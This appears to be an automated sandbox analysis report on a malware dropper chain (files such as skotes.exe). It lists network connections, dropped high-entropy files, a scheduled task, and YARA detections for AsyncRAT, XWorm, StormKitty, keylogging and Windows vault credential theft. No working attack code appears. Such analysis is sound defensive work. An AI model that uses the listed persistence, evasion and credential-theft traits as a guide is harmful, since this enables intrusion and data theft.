Source: 1639401074.exe, 0000001C.00000002.2946265286.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54893
Source: unknown	Network traffic detected: HTTP traffic on port 54892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55073
Source: unknown	Network traffic detected: HTTP traffic on port 54895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55071
Source: unknown	Network traffic detected: HTTP traffic on port 54751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54825
Source: unknown	Network traffic detected: HTTP traffic on port 54728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54946
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54785
Source: unknown	Network traffic detected: HTTP traffic on port 54911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54783
Source: unknown	Network traffic detected: HTTP traffic on port 54946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54822
Source: unknown	Network traffic detected: HTTP traffic on port 54875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54942
Source: unknown	Network traffic detected: HTTP traffic on port 54869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54790
Source: unknown	Network traffic detected: HTTP traffic on port 54905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55080
Source: unknown	Network traffic detected: HTTP traffic on port 54714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54714
Source: unknown	Network traffic detected: HTTP traffic on port 55071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54713
Source: unknown	Network traffic detected: HTTP traffic on port 54822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54728
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 54726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54726
Source: unknown	Network traffic detected: HTTP traffic on port 54808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54840
Source: unknown	Network traffic detected: HTTP traffic on port 54873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55018
Source: unknown	Network traffic detected: HTTP traffic on port 54785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 55080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 54825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54736
Source: unknown	Network traffic detected: HTTP traffic on port 54721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54855
Source: unknown	Network traffic detected: HTTP traffic on port 54899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54869
Source: unknown	Network traffic detected: HTTP traffic on port 54885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54902
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54901
Source: unknown	Network traffic detected: HTTP traffic on port 54915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54905
Source: unknown	Network traffic detected: HTTP traffic on port 54893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54909
Source: unknown	Network traffic detected: HTTP traffic on port 54718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55047
Source: unknown	Network traffic detected: HTTP traffic on port 54874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54755
Source: unknown	Network traffic detected: HTTP traffic on port 54855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54875
Source: unknown	Network traffic detected: HTTP traffic on port 54897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54881
Source: unknown	Network traffic detected: HTTP traffic on port 54755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54808
Source: unknown	Network traffic detected: HTTP traffic on port 55047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54883
Source: unknown	Network traffic detected: HTTP traffic on port 54747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54887
Source: unknown	Network traffic detected: HTTP traffic on port 54722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55067
Source: unknown	Network traffic detected: HTTP traffic on port 54789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54750 -> 443

Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:54736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:54747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.5:54748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:54905 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.5:54907 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Keylogger Generic

Source: Yara match

File source: Process Memory Space: regsvr32.exe PID: 6404, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Source: C:\Windows\System32\regsvr32.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe entropy: 7.99815839126	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062147001\db8c172567.exe entropy: 7.99815839126	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	File created: C:\Users\user\AppData\Local\Temp\Comics entropy: 7.99757886329	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	File created: C:\Users\user\AppData\Local\Temp\Japanese entropy: 7.99686012246	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	File created: C:\Users\user\AppData\Local\Temp\Put entropy: 7.9976114418	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	File created: C:\Users\user\AppData\Local\Temp\Arbitration entropy: 7.99727723824	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	File created: C:\Users\user\AppData\Local\Temp\Characterized entropy: 7.99711087268	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	File created: C:\Users\user\AppData\Local\Temp\Entries entropy: 7.99722969418	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	File created: C:\Users\user\AppData\Local\Temp\Geographic entropy: 7.99870329299	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\36469\L entropy: 7.99955700326	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	File created: C:\Users\user\AppData\Local\Temp\Hills entropy: 7.99438989644	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	File created: C:\Users\user\AppData\Local\Temp\Soundtrack entropy: 7.99781086698	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	File created: C:\Users\user\AppData\Local\Temp\Plumbing entropy: 7.99709677072	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	File created: C:\Users\user\AppData\Local\Temp\Complement entropy: 7.99710096126	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	File created: C:\Users\user\AppData\Local\Temp\Fm entropy: 7.99863955856	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\F entropy: 7.99919046719	Jump to dropped file

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Windows\System32\regsvr32.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 34.2.regsvr32.exe.64ca5e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 34.2.regsvr32.exe.64ca5e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 34.2.regsvr32.exe.1c730000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 34.2.regsvr32.exe.211131e.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 34.2.regsvr32.exe.211131e.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 34.2.regsvr32.exe.2310000.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 34.2.regsvr32.exe.2310000.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 34.2.regsvr32.exe.1c730000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 34.2.regsvr32.exe.1c580000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 34.2.regsvr32.exe.1c580000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 34.2.regsvr32.exe.64ca5e.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 34.2.regsvr32.exe.64ca5e.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 34.2.regsvr32.exe.1c580000.5.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 34.2.regsvr32.exe.1c580000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000022.00000002.4535552791.000000001C730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

PE file contains section with special chars

Source: DbCMTMgeJo.exe	Static PE information: section name:
Source: DbCMTMgeJo.exe	Static PE information: section name: .idata
Source: DbCMTMgeJo.exe	Static PE information: section name:
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: section name:
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: section name: .idata
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: section name:
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe.0.dr	Static PE information: section name:
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.4.dr	Static PE information: section name:
Source: skotes.exe.4.dr	Static PE information: section name: .idata
Source: random[1].exe1.7.dr	Static PE information: section name:
Source: random[1].exe1.7.dr	Static PE information: section name: .idata
Source: random[1].exe1.7.dr	Static PE information: section name:
Source: 1639401074.exe.7.dr	Static PE information: section name:
Source: 1639401074.exe.7.dr	Static PE information: section name: .idata
Source: 1639401074.exe.7.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 7_2_00FCCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

7_2_00FCCB97

Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	File created: C:\Windows\DpInvestigated
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	File created: C:\Windows\PromotionalToken
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	File created: C:\Windows\PropeciaJoan
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	File created: C:\Windows\WestCornell
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	File created: C:\Windows\SchedulesAb
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	File created: C:\Windows\ContainsBefore
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	File created: C:\Windows\TokenDetroit
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	File created: C:\Windows\AttacksContacted

Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Code function: 4_2_00125C83	4_2_00125C83
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Code function: 4_2_0012735A	4_2_0012735A
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Code function: 4_2_00168860	4_2_00168860
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Code function: 4_2_00124DE0	4_2_00124DE0
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Code function: 4_2_00124B30	4_2_00124B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FF78BB	5_2_00FF78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FF8860	5_2_00FF8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FF7049	5_2_00FF7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FF31A8	5_2_00FF31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FB4B30	5_2_00FB4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FB4DE0	5_2_00FB4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FF2D10	5_2_00FF2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FF779B	5_2_00FF779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FE7F36	5_2_00FE7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FBE530	7_2_00FBE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FD6192	7_2_00FD6192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FF8860	7_2_00FF8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FB4B30	7_2_00FB4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FB4DE0	7_2_00FB4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FF2D10	7_2_00FF2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FD0E13	7_2_00FD0E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FF7049	7_2_00FF7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FF31A8	7_2_00FF31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FD1602	7_2_00FD1602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FF779B	7_2_00FF779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FF78BB	7_2_00FF78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FD3DF1	7_2_00FD3DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FE7F36	7_2_00FE7F36

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FC7A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FC80C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FCD663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FCD942 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FCD64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FCDF80 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FE8E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Code function: String function: 001380C0 appears 130 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 5256 -ip 5256

Source: random[1].exe0.7.dr	Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
Source: 63460ff8c7.exe.7.dr	Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
Source: random[1].exe2.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 21aaa725bd.exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 21aaa725bd.tmp.29.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 21aaa725bd.tmp.29.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 21aaa725bd.tmp.31.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 21aaa725bd.tmp.31.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-TG5QS.tmp.32.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-TG5QS.tmp.32.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: is-1MO68.tmp.32.dr

Static PE information: Number of sections : 23 > 10

Source: DbCMTMgeJo.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

